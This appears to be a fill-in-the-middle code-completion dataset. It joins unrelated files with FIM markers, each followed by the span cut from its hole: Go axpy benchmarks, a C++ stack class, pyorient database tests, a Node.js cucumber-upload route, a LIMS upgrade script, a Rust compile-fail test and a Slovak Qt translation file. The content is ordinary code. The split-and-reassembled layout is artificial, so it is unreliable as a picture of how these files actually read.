-1, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000IncM2(b *testing.B) { benchaxpyinc(b, 100000, -2, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000IncM4(b *testing.B) { benchaxpyinc(b, 100000, -4, naiveaxpyinc) } func BenchmarkLF32AxpyIncN100000IncM10(b *testing.B) { benchaxpyinc(b, 100000, -10, naiveaxpyinc) } func benchaxpyincto(t *testing.B, ln, t_inc int, f func(dst []float32, incDst, idst uintptr, alpha float32, x, y []float32, n, incX, incY, ix, iy uintptr)) { n, inc := uintptr(ln), uintptr(t_inc) var idx int if t_inc < 0 { idx = (-ln + 1) * t_inc } for i := 0; i < t.N; i++ { f(z, inc, uintptr(idx), 1, x, y, n, inc, inc, uintptr(idx), uintptr(idx)) } } func naiveaxpyincto(dst []float32, incDst, idst uintptr, alpha float32, x, y []float32, n, incX, incY, ix, iy uintptr) { for i := 0; i < int(n); i++ { dst[idst] = alpha*x[ix] + y[iy] ix += incX iy += incY idst += incDst } } func BenchmarkF32AxpyIncToN1Inc1(b *testing.B) { benchaxpyincto(b, 1, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN2Inc1(b *testing.B) { benchaxpyincto(b, 2, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN2Inc2(b *testing.B) { benchaxpyincto(b, 2, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN2Inc4(b *testing.B) { benchaxpyincto(b, 2, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN2Inc10(b *testing.B) { benchaxpyincto(b, 2, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN3Inc1(b *testing.B) { benchaxpyincto(b, 3, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN3Inc2(b *testing.B) { benchaxpyincto(b, 3, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN3Inc4(b *testing.B) { benchaxpyincto(b, 3, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN3Inc10(b *testing.B) { benchaxpyincto(b, 3, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN4Inc1(b *testing.B) { benchaxpyincto(b, 4, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN4Inc2(b *testing.B) { benchaxpyincto(b, 4, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN4Inc4(b *testing.B) { benchaxpyincto(b, 4, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN4Inc10(b *testing.B) { benchaxpyincto(b, 4, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN10Inc1(b *testing.B) { benchaxpyincto(b, 10, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN10Inc2(b *testing.B) { benchaxpyincto(b, 10, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN10Inc4(b *testing.B) { benchaxpyincto(b, 10, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN10Inc10(b *testing.B) { benchaxpyincto(b, 10, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN1000Inc1(b *testing.B) { benchaxpyincto(b, 1000, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN1000Inc2(b *testing.B) { benchaxpyincto(b, 1000, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN1000Inc4(b *testing.B) { benchaxpyincto(b, 1000, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN1000Inc10(b *testing.B) { benchaxpyincto(b, 1000, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000Inc1(b *testing.B) { benchaxpyincto(b, 100000, 1, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000Inc2(b *testing.B) { benchaxpyincto(b, 100000, 2, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000Inc4(b *testing.B) { benchaxpyincto(b, 100000, 4, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000Inc10(b *testing.B) { benchaxpyincto(b, 100000, 10, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000IncM1(b *testing.B) { benchaxpyincto(b, 100000, -1, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000IncM2(b *testing.B) { benchaxpyincto(b, 100000, -2, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000IncM4(b *testing.B) { benchaxpyincto(b, 100000, -4, AxpyIncTo) } func BenchmarkF32AxpyIncToN100000IncM10(b *testing.B) { benchaxpyincto(b, 100000, -10, AxpyIncTo) } func BenchmarkLF32AxpyIncToN1Inc1(b *testing.B) { benchaxpyincto(b, 1, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN2Inc1(b *testing.B) { benchaxpyincto(b, 2, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN2Inc2(b *testing.B) { benchaxpyincto(b, 2, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN2Inc4(b *testing.B) { benchaxpyincto(b, 2, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN2Inc10(b *testing.B) { benchaxpyincto(b, 2, 10, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN3Inc1(b *testing.B) { benchaxpyincto(b, 3, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN3Inc2(b *testing.B) { benchaxpyincto(b, 3, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN3Inc4(b *testing.B) { benchaxpyincto(b, 3, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN3Inc10(b *testing.B) { benchaxpyincto(b, 3, 10, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN4Inc1(b *testing.B) { benchaxpyincto(b, 4, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN4Inc2(b *testing.B) { benchaxpyincto(b, 4, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN4Inc4(b *testing.B) { benchaxpyincto(b, 4, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN4Inc10(b *testing.B) { benchaxpyincto(b, 4, 10, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN10Inc1(b *testing.B) { benchaxpyincto(b, 10, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN10Inc2(b *testing.B) { benchaxpyincto(b, 10, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN10Inc4(b *testing.B) { benchaxpyincto(b, 10, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN10Inc10(b *testing.B) { benchaxpyincto(b, 10, 10, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN1000Inc1(b *testing.B) { benchaxpyincto(b, 1000, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN1000Inc2(b *testing.B) { benchaxpyincto(b, 1000, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN1000Inc4(b *testing.B) { benchaxpyincto(b, 1000, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN1000Inc10(b *testing.B) { benchaxpyincto(b, 1000, 10, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000Inc1(b *testing.B) { benchaxpyincto(b, 100000, 1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000Inc2(b *testing.B) { benchaxpyincto(b, 100000, 2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000Inc4(b *testing.B) { benchaxpyincto(b, 100000, 4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000Inc10(b *testing.B) { benchaxpyincto(b, 100000, 10, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000IncM1(b *testing.B) { benchaxpyincto(b, 100000, -1, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000IncM2(b *testing.B) { benchaxpyincto(b, 100000, -2, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000IncM4(b *testing.B) { benchaxpyincto(b, 100000, -4, naiveaxpyincto) } func BenchmarkLF32AxpyIncToN100000IncM10(b *testing.B) { benchaxpyincto(b, 100000, -10, naiveaxpyincto) }<|fim▁end|>
<|file_name|>Stack.cpp<|end_file_name|><|fim▁begin|>/* ** Stack.cpp for cpp_abstractvm in /var/projects/cpp_abstractvm/Stack.cpp ** ** Made by kevin labbe ** Login <[email protected]> ** ** Started on Mar 1, 2014 2:15:13 AM 2014 kevin labbe ** Last update Mar 1, 2014 2:15:13 AM 2014 kevin labbe */ #include "EmptyStackException.hpp" #include "AssertFailedException.hpp" #include "WrongParameterException.hpp" #include "Stack.hpp" namespace Arithmetic { Stack::Stack() { _funcs["add"] = &Stack::add; _funcs["sub"] = &Stack::sub; _funcs["mul"] = &Stack::mul; _funcs["div"] = &Stack::div; _funcs["mod"] = &Stack::mod; _funcs["pop"] = &Stack::pop; _funcs["dump"] = &Stack::dump; _funcs["print"] = &Stack::print; } Stack::~Stack() { } void Stack::execFunc(const std::string& name) { if (_funcs[name.c_str()]) (this->*_funcs[name.c_str()])(); } void Stack::push(IOperand* op) { _stack.push_front(op); } void Stack::pop() { if (_stack.empty()) throw Exception::EmptyStackException("pop"); delete _stack.front(); _stack.pop_front(); } void Stack::assert(IOperand* op) { if (_stack.empty()) throw Exception::AssertFailedException("Stack empty"); if (_stack.front()->getPrecision() != op->getPrecision() || _stack.front()->getType() != op->getType() || _stack.front()->toString() != op->toString()) throw Exception::AssertFailedException("Operand different at the top of the stack"); } void Stack::dump() { for (std::deque<IOperand*>::iterator it = _stack.begin(); it != _stack.end(); it++) std::cout << (*it)->toString() << std::endl; } void Stack::print() { std::stringstream stream; char chr; int nbr; if (_stack.empty()) throw Exception::EmptyStackException("print"); if (_stack.front()->getType() != INT8) throw Exception::WrongParameterException("print expects an int8 at the top of the stack"); stream << _stack.front()->toString(); stream >> nbr; chr = nbr; std::cout << chr << std::endl; } void Stack::add() { _loadOperands(); _pushResult(*_op1 + *_op2); } void Stack::sub() { _loadOperands(); _pushResult(*_op1 - *_op2); } void Stack::mul() { _loadOperands(); _pushResult(*_op1 * *_op2); } void Stack::div() { _loadOperands(); _pushResult(*_op1 / *_op2); } void Stack::mod() { _loadOperands(); _pushResult(*_op1 % *_op2); } void Stack::_loadOperands() {<|fim▁hole|> throw Exception::EmptyStackException("Calc"); _op1 = _stack.front(); _stack.pop_front(); _op2 = _stack.front(); _stack.pop_front(); } void Stack::_pushResult(IOperand* result) { _stack.push_front(result); delete _op1; delete _op2; } } /* namespace Arithmetic */<|fim▁end|>
if (_stack.size() < 2)
<|file_name|>test_record_contents.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- __author__ = 'Ostico <[email protected]>' import unittest import os os.environ['DEBUG'] = "1" os.environ['DEBUG_VERBOSE'] = "0" import pyorient class CommandTestCase(unittest.TestCase): def __init__(self, *args, **kwargs): super(CommandTestCase, self).__init__(*args, **kwargs) self.client = None self.cluster_info = None self.class_id1 = None def setUp(self): self.client = pyorient.OrientDB("localhost", 2424) self.client.connect("root", "root") db_name = "test_tr" try: self.client.db_drop(db_name) except pyorient.PyOrientStorageException as e: print(e) finally: db = self.client.db_create(db_name, pyorient.DB_TYPE_GRAPH, pyorient.STORAGE_TYPE_MEMORY) pass self.cluster_info = self.client.db_open( db_name, "root", "root", pyorient.DB_TYPE_GRAPH, "" ) self.class_id1 = \ self.client.command("create class my_v_class extends V")[0] def test_boolean(self): rec = self.client.command('create vertex v content {"abcdef":false,' '"qwerty":TRUE}') assert rec[0].abcdef is not True, "abcdef expected False: '%s'" % rec[ 0].abcdef assert rec[0].qwerty is True, "qwerty expected True: '%s'" % rec[ 0].qwerty rec_value = self.client.query('select from v') assert rec_value[0].abcdef is not True, "abcdef expected False: '%s'" % \ rec_value[0].abcdef assert rec_value[0].qwerty is True, "qwerty expected True: '%s'" % \ rec_value[0].qwerty def test_record_create_nonstrings(self): # this should succeed with no exception self.client.record_create(self.class_id1, {'@my_v_class': {'a': 1.5, 'b': 'foo'}}) def test_record_create_embedded_list(self): # this should succeed with no exception self.client.record_create(self.class_id1, {'@my_v_class': {'a': ['bar', 'bar']}}) def test_record_create_embedded_dictionary(self): # this should succeed with no exception self.client.record_create(self.class_id1, {'@my_v_class': {'a': [{'bar': 'bar'}]}}) def test_new_orient_dict(self): rec = self.client.command('create vertex v content {"a":false,' '"q":TRUE}') assert rec[0].a is False assert rec[0].q is True import re # this can differ from orientDB versions, so i use a regular expression assert re.match('[0-1]', str(rec[0]._version)) assert rec[0]._rid == '#10:0' rec = {'a': 1, 'b': 2, 'c': 3} rec_position = self.client.record_create(3, rec) assert rec_position.a == 1 assert rec_position.b == 2 assert rec_position.c == 3 # this can differ from orientDB versions, so i use a regular expression assert re.match('[0-1]', str(rec_position._version)) assert rec_position._rid == '#3:0' res = self.client.query("select from " + rec_position._rid) assert res[0].a == 1 assert res[0].b == 2 assert res[0].c == 3 # this can differ from orientDB versions, so i use a regular expression assert re.match('[0-1]', str(res[0]._version)) assert res[0]._rid == '#3:0' print(res[0].oRecordData['a']) def test_embedded_map(self): res = self.client.command( 'create vertex v content {"a":1,"b":{"d":"e"},"c":3}' ) # print(res[0]) res = self.client.command( 'create vertex v content {"a":1,"b":{},"c":3}' ) # print(res[0]) # print(res[0].oRecordData['b']) assert res[0].oRecordData['b'] == {}, "Failed to asert that received " + \ res[0].oRecordData['b'] + " equals '{}" res = self.client.command('create vertex v content {"a":1,"b":{}}') # print(res[0]) assert res[0].oRecordData['b'] == {}, "Failed to asert that received " \ "" + res[0].oRecordData['b'] + \ " equals '{}" res = self.client.command( 'create vertex v content {"b":{},"a":1,"d":{}}' ) # print(res[0]) assert res[0].oRecordData['b'] == {}, "Failed to asert that received " \ "" + res[0].oRecordData['b'] + \ " equals '{}" assert res[0].oRecordData['d'] == {}, "Failed to asert that received " \ "" + res[0].oRecordData['d'] + \ " equals '{}" def test_nested_objects_1(self): res = self.client.command( 'create vertex v content {"b":[[1]],"a":{},"d":[12],"c":["x"]}' ) print(res[0]) def test_nested_objects_2(self): res = self.client.command( 'create vertex v content {"b":[[1,"abc"]]}' ) print(res[0]) assert res[0].oRecordData['b'][0][0] == 1 assert res[0].oRecordData['b'][0][1] == "abc" def test_nested_objects_3(self): res = self.client.command( 'create vertex v content {"b":[[1,{"abc":2}]]}' ) print(res[0]) assert res[0].oRecordData['b'][0][0] == 1 assert res[0].oRecordData['b'][0][1]['abc'] == 2 def test_nested_objects_4(self): res = self.client.command( 'create vertex v content {"b":[[1,{"abc":2}],[3,{"cde":4}]]}' ) print(res[0]) assert res[0].oRecordData['b'][0][0] == 1 assert res[0].oRecordData['b'][0][1]['abc'] == 2 assert res[0].oRecordData['b'][1][0] == 3 assert res[0].oRecordData['b'][1][1]['cde'] == 4 def test_nested_objects_5(self): res = self.client.command( 'create vertex v content ' '{"b":[[1,{"dx":[1,2]},"abc"]],"a":{},"d":[12],"c":["x"],"s":111}' ) assert res[0].oRecordData['b'][0][0] == 1 assert res[0].oRecordData['b'][0][1]['dx'][0] == 1 assert res[0].oRecordData['b'][0][1]['dx'][1] == 2 assert res[0].oRecordData['b'][0][2] == "abc" assert res[0].oRecordData['a'] == {} assert res[0].oRecordData['d'][0] == 12 assert res[0].oRecordData['c'][0] == "x" assert res[0].oRecordData['s'] == 111 print(res[0]) def test_nested_objects_6(self): res = self.client.command( 'create vertex v content ' '{"b":[[1,2,"abc"]]}' ) assert res[0].oRecordData['b'][0][0] == 1 assert res[0].oRecordData['b'][0][1] == 2 assert res[0].oRecordData['b'][0][2] == "abc" print(res[0]) def test_nested_objects_7(self): res = self.client.command( 'create vertex v content ' '{"b":[{"xx":{"xxx":[1,2,"abc"]}}]}' ) assert isinstance(res[0].oRecordData['b'], list) assert isinstance(res[0].oRecordData['b'][0], dict) assert isinstance(res[0].oRecordData['b'][0]['xx'], dict) assert isinstance(res[0].oRecordData['b'][0]['xx']['xxx'], list) assert res[0].oRecordData['b'][0]['xx']['xxx'][0] == 1 assert res[0].oRecordData['b'][0]['xx']['xxx'][1] == 2 assert res[0].oRecordData['b'][0]['xx']['xxx'][2] == "abc" print(res[0]) def test_nested_objects_8(self): res = self.client.command( 'create vertex v content ' '{"b":[{"xx":{"xxx":[1,2,"abc"]}}],"c":[{"yy":{"yyy":[3,4,"cde"]}}]}' ) assert isinstance(res[0].oRecordData['b'], list) assert isinstance(res[0].oRecordData['b'][0], dict) assert isinstance(res[0].oRecordData['b'][0]['xx'], dict) assert isinstance(res[0].oRecordData['b'][0]['xx']['xxx'], list) assert res[0].oRecordData['b'][0]['xx']['xxx'][0] == 1 assert res[0].oRecordData['b'][0]['xx']['xxx'][1] == 2 assert res[0].oRecordData['b'][0]['xx']['xxx'][2] == "abc" assert isinstance(res[0].oRecordData['c'], list) assert isinstance(res[0].oRecordData['c'][0], dict) assert isinstance(res[0].oRecordData['c'][0]['yy'], dict) assert isinstance(res[0].oRecordData['c'][0]['yy']['yyy'], list) assert res[0].oRecordData['c'][0]['yy']['yyy'][0] == 3 assert res[0].oRecordData['c'][0]['yy']['yyy'][1] == 4 assert res[0].oRecordData['c'][0]['yy']['yyy'][2] == "cde" print(res[0]) <|fim▁hole|> '{"a":[[1,2],[3,4],[5,6],null]}' ) assert isinstance(res[0].oRecordData['a'], list) assert isinstance(res[0].oRecordData['a'][0], list) assert isinstance(res[0].oRecordData['a'][1], list) assert isinstance(res[0].oRecordData['a'][2], list) assert res[0].oRecordData['a'][0][0] == 1 assert res[0].oRecordData['a'][0][1] == 2 print(res[0]) def test_nested_objects_10(self): res = self.client.command( 'create vertex v content ' '{"embedded_map":{"one":[1,2]}}' ) assert isinstance(res[0].oRecordData['embedded_map'], dict) assert isinstance(res[0].oRecordData['embedded_map']['one'], list) assert res[0].oRecordData['embedded_map']['one'][0] == 1 assert res[0].oRecordData['embedded_map']['one'][1] == 2 print(res[0]) def test_nested_objects_11(self): res = self.client.command( 'create vertex v content ' '{"embedded_map":{"one":{"three":4}}}' ) assert isinstance(res[0].oRecordData['embedded_map'], dict) assert isinstance(res[0].oRecordData['embedded_map']['one'], dict) assert res[0].oRecordData['embedded_map']['one']["three"] == 4 print(res[0]) def test_nested_objects_12(self): res = self.client.command( 'create vertex v content ' '{"embedded_map":{"one":2}}' ) assert isinstance(res[0].oRecordData['embedded_map'], dict) assert res[0].oRecordData['embedded_map']['one'] == 2 print(res[0]) def test_nested_objects_13(self): res = self.client.command( 'create vertex v content ' '{"a":1,"b":{},"c":3}' ) assert res[0].oRecordData['a'] == 1 assert isinstance(res[0].oRecordData['b'], dict) assert len(res[0].oRecordData['b']) == 0 assert res[0].oRecordData['c'] == 3 print(res[0]) def test_quotes(self): import json test_data = {'scenario': 'a "quote" follows'} record = self.client.command("CREATE VERTEX V CONTENT " + json.dumps(test_data))[0] assert record._rid == '#10:0' assert record.oRecordData['scenario'] == 'a "quote" follows' def test_db_list(self): self.client.connect("root", "root") databases = self.client.db_list() assert databases.oRecordData['databases']['GratefulDeadConcerts'] def test_datetime(self): x = self.client.query( "SELECT DATE('2015-01-02 03:04:05')" ) x = x[0].oRecordData import datetime assert 'DATE' in x assert isinstance(x['DATE'], datetime.datetime) assert str(x['DATE']) == '2015-01-02 03:04:05' def test_deserialize_numeric_types(self): lon1 = self.client.command( "CREATE VERTEX V CONTENT {'longitude': 1.1}")[0].longitude lon2 = self.client.command( "CREATE VERTEX V CONTENT {'longitude': -1.1}")[0].longitude lon3 = self.client.command( "CREATE VERTEX V CONTENT {'longNum': 5356336298435356336}" )[0].longNum lon4 = self.client.command( "CREATE VERTEX V CONTENT {'sciNum': 6.022E23}" )[0].sciNum lon5 = self.client.command( "CREATE VERTEX V CONTENT {'sciNum': 6.022E-23}" )[0].sciNum assert isinstance(lon1, float), \ "type(lon1) is not equal to 'float': %r" % type(lon1) assert isinstance(lon2, float), \ "type(lon2) is not equal to 'float': %r" % type(lon2) assert isinstance(lon4, float), \ "type(lon4) is not equal to 'float': %r" % type(lon4) assert isinstance(lon5, float), \ "type(lon5) is not equal to 'float': %r" % type(lon5) assert isinstance(lon3, int), \ "type(lon3) is not equal to 'int': %r" \ % type(lon3)<|fim▁end|>
def test_nested_objects_9(self): res = self.client.command( 'create vertex v content '
<|file_name|>cucumber-upload.js<|end_file_name|><|fim▁begin|>'use strict'; const Joi = require('joi'); const uuid = require('uuid'); const reqUtils = require('../utils/requestUtils'); const R = require('ramda'); //fixme: allow unknown fields and just require absolutely mandatory ones const cucumberSchema = Joi.array().items(Joi.object().keys({ id: Joi.string().required(), name: Joi.string().required(), description: Joi.string(), line: Joi.number().integer(), keyword: Joi.string(), uri: Joi.string(), elements: Joi.array().items(Joi.object().keys({ name: Joi.string().required(), id: Joi.string().required(), line: Joi.number().integer(), keyword: Joi.string(), description: Joi.string(), type: Joi.string().required(), steps: Joi.array().items(Joi.object().keys({ name: Joi.string(), line: Joi.number().integer(), keyword: Joi.string(), result: Joi.object().keys({<|fim▁hole|> status: Joi.string(), duration: Joi.number().integer() }), match: Joi.object().keys({ location: Joi.string() }) })) })) })); module.exports = function (server, emitter) { server.route({ method: 'POST', path: '/upload/cucumber', config: { tags: ['upload'], payload: { //allow: ['multipart/form-data'], parse: true, output: 'stream' }, validate: { query: { evaluation: Joi.string().min(1).required(), evaluationTag: Joi.string().min(1).required(), subject: Joi.string().min(1).required() } } }, handler: function(request, reply) { return reqUtils.getObject(request, 'cucumber') .then(o => reqUtils.validateObject(o, cucumberSchema)) .then(report => { emitter.emit( 'uploads/cucumber', R.assoc('report', report, R.pick(['subject', 'evaluation', 'evaluationTag'], request.query)) ); return reply().code(202); }) // fixme: this will resolve even internal errors as 429's // break the initial processing (which returns 429 codes) // from the final one (which returns 5xx codes) .catch(e => { return reply(e.message).code(400); }); } }); };<|fim▁end|>
<|file_name|>to3015.py<|end_file_name|><|fim▁begin|>from dependencies.dependency import aq_inner from dependencies.dependency import aq_parent from lims.permissions import * from dependencies.dependency import BaseContent from lims.upgrade import stub def upgrade(tool):<|fim▁hole|> # Hack prevent out-of-date upgrading # Related: PR #1484 # https://github.com/bikalabs/Bika-LIMS/pull/1484 from lims.upgrade import skip_pre315 if skip_pre315(aq_parent(aq_inner(tool))): return True portal = aq_parent(aq_inner(tool)) setup = portal.portal_setup setup.runImportStepFromProfile('profile-bika.lims:default', 'typeinfo') stub('bika.lims.content.invoicelineitem', 'InvoiceLineItem', BaseContent) for inv in portal['invoices'].objectValues(): inv.invoice_lineitems = [] for invl in inv.objectValues(): item = dict( ItemDate=invl.ItemDate, ItemDescription=invl.ItemDescription, ClientOrderNumber=invl.ClientOrderNumber, Subtotal=invl.Subtotal, VATAmount=invl.VATAmount, Total=invl.Total, ) inv.invoice_lineitems.append(item) return True<|fim▁end|>
<|file_name|>issue-10200.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. <|fim▁hole|> match Foo(true) { foo(x) //~ ERROR `foo` is not an enum variant, struct or const => () } }<|fim▁end|>
struct Foo(bool); fn foo(_: uint) -> Foo { Foo(false) } fn main() {
<|file_name|>iTestClient-sk.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" encoding="utf-8"?> <!DOCTYPE TS> <TS version="2.0" language="sk_SK"> <context> <name>AboutWidget</name> <message> <source>About iTest</source> <translation>O programe iTest</translation> </message> <message> <source>About Qt</source> <translation>O Qt</translation> </message> <message> <source>This program is distributed under the terms of the GPL v2.</source> <translation>Tento program je distribuovaný pod licenciou GPL v2.</translation> </message> <message> <source>The program is provided AS IS with ABSOLUTELY NO WARRANTY OF ANY KIND, INCLUDING THE WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.</source> <translation>Tento program je poskytovaný TAK AKO JE s ABSOLÚTNE ŽIADNOU ZÁRUKOU AKÉHOKOĽVEK DRUHU.</translation> </message> <message> <source>iTest</source> <translation>iTest</translation> </message> <message> <source>Version %1</source> <translation>Verzia %1</translation> </message> <message> <source>Licence</source> <translation>Licencia</translation> </message> <message> <source>iTest is an application suite consisting of a Server and a Client designed for easy computerised examination.</source> <translation>iTest je sada aplikácií pozostávajúca zo serverového a klientského programu dizajnovaných pre jednoduché skúšanie pomocou počítača.</translation> </message> <message> <source>http://www.gnu.org/licenses/gpl-2.0.html</source> <translation>http://www.gpl.sk/v2/</translation> </message> </context> <context> <name>MainWindow</name> <message> <source>Cannot write file %1: %2.</source> <translation>Nemôžem zapisovať do súboru %1: %2.</translation> </message> <message> <source>Ready</source> <translation>Pripravený</translation> </message> <message> <source>Open database</source> <translation>Otvoriť databázu</translation> </message> <message> <source>Open database file</source> <translation>Otvoriť databázový súbor</translation> </message> <message> <source>Cannot read file %1: %2.</source> <translation>Nemôžem čítať súbor %1: %2.</translation> </message> <message> <source>iTest version notice</source> <translation>Upozornenie o verzii iTest</translation> </message> <message> <source>You need a newer version of iTest to open this database file.</source> <translation>Na otvorenie tohto databázového súboru potrebujete novšiu verziu programu iTest.</translation> </message> <message> <source>Database date</source> <translation>Dátum</translation> </message> <message> <source>&lt;b&gt;Results:&lt;/b&gt;</source> <translation>&lt;b&gt;Výsledky:&lt;/b&gt;</translation> </message> <message> <source>&lt;b&gt;Name:&lt;/b&gt;</source> <translation>&lt;b&gt;Meno:&lt;/b&gt;</translation> </message> <message> <source>Comments</source> <translation>Poznámky</translation> </message> <message> <source>There is a newer version of iTest available. Nonetheless, this version is able to open the database file you selected, but you are most probably missing a whole bunch of cool new features.</source> <translation type="obsolete">Je dostupná nová verzia iTest. Napriek tomu však táto verzia vie otvoriť vybraný databázový súbor, ale pravdepodobne prichádzate o množstvo nových možností.</translation> </message> <message> <source>Retrieving test data...</source> <translation>Získavam testové dáta...</translation> </message> <message> <source>Save answer log</source> <translation>Uložiť záznam odpovedí</translation> </message> <message> <source>The host was not found. Please check the host name and port settings.</source> <translation>Hostiteľ nenájdený. Prosím skontrolujte meno hostiteľa a nastavenie portu.</translation> </message> <message> <source>The connection was refused by the peer. Make sure the iTest server is running, and check that the host name and port settings are correct.</source> <translation>Spojenie odmietnuté peerom. Uistite sa, že server iTest beží, a že meno hostiteľa a nastavenie portu sú správne.</translation> </message> <message> <source>The following error occurred: %1.</source> <translation>Vyskytla sa nasledujúca chyba: %1.</translation> </message> <message> <source>Output file path</source> <translation>Cesta k výstupnému súboru</translation> </message> <message> <source>answers.itcl</source> <translation>odpovede.itcl</translation> </message> <message> <source>iTest off-line client log (*.itcl)</source> <translation>iTest off-line záznamy o klientoch (*.itcl)</translation> </message> <message> <source>Loading test data...</source> <translation>Načítavam testové dáta...</translation> </message> <message> <source>Reading database file...</source> <translation>Čítam databázový súbor...</translation> </message> <message> <source>Generating test...</source> <translation>Generujem test...</translation> </message> <message> <source>Finish the exam</source> <translation>Ukončiť skúšku</translation> </message> <message> <source>Are you sure you want to finish? Once you click Finish there is no going back.</source> <translation>Naozaj chcete skončiť? Po kliknutí na &quot;Koniec&quot; sa už nedá vrátiť späť.</translation> </message> <message> <source>&amp;Finish</source> <translation>&amp;Koniec</translation> </message> <message> <source>&amp;Cancel</source> <translation>&amp;Zrušiť</translation> </message> <message> <source>Your name, please.</source> <translation>Vaše meno, prosím.</translation> </message> <message> <source>You cannot proceed unless you give us your name.</source> <translation>Nemôžete pokračovať, kým neuvediete svoje meno.</translation> </message> <message> <source>Exam finished</source> <translation>Skúška ukončená</translation> </message> <message> <source>You have run out of time. Your answers are being sent.</source> <translation>Váš čas vypršal. Vaše odpovede sa posielajú.</translation> </message> <message> <source>Invalid data received. There might be something wrong with the server.</source> <translation>Prijaté neplatné dáta. Možno niečo nie je v poriadku so serverom.</translation> </message> <message> <source>Connect to an iTest server</source> <translation>Pripojiť sa k serveru iTest</translation> </message> <message> <source>&lt;b&gt;Server name&lt;/b&gt;</source> <translation>&lt;b&gt;Meno servera&lt;/b&gt;</translation> </message> <message> <source>&lt;b&gt;Server port&lt;/b&gt;</source> <translation>&lt;b&gt;Port servera&lt;/b&gt;</translation> </message> <message> <source>Connect</source> <translation>Pripojiť</translation> </message> <message> <source>Use an iTest database file</source> <translation>Použiť databázový súbor iTest</translation> </message> <message> <source>&lt;b&gt;Database file path&lt;/b&gt;</source> <translation>&lt;b&gt;Cesta k databázovému súboru&lt;/b&gt;</translation> </message> <message> <source>Browse</source> <translation>Prehľadávať</translation> </message> <message> <source>Load</source> <translation>Načítať</translation> </message> <message> <source>&lt;b&gt;Save answers to&lt;/b&gt;</source> <translation>&lt;b&gt;Uložiť odpovede do&lt;/b&gt;</translation> </message> <message> <source>If connected to an iTest server, results will be sent automatically. You only need this file if there is no network available or in case of connection breakdown.</source> <translation>Ak ste pripojení na server iTest, odpovede sa zašlú automaticky. Tento súbor budete potrebovať len vtedy, keď nemáte k dispozícii sieť alebo v prípade zlyhania pripojenia.</translation> </message> <message> <source>$HOME/TestName-Date-SurnameName.itcl, where $HOME is the directory of the current user&apos;s profile on Windows and the home directory on Unix/Linux/Mac OS</source> <translation>$HOME/MenoTestu-Dátum-PriezviskoMeno.itcl, kde $HOME je priečinok aktuálneho užívateľského účtu vo Windows a domovský priečinok v systémoch Unix/Linux/Mac OS</translation> </message> <message> <source>Use default</source> <translation>Použiť štandardné nastavenie</translation> </message> <message> <source>&lt;b&gt;Test information&lt;/b&gt;</source> <translation>&lt;b&gt;Informácie o teste&lt;/b&gt;</translation> </message> <message> <source>Test name</source> <translation>Meno testu</translation> </message> <message> <source>Test date</source> <translation>Dátum testu</translation> </message> <message> <source>Test time</source> <translation>Čas na test</translation> </message> <message> <source>Number of questions</source> <translation>Počet otázok</translation> </message> <message> <source>Number of categories</source> <translation>Počet kategórií</translation> 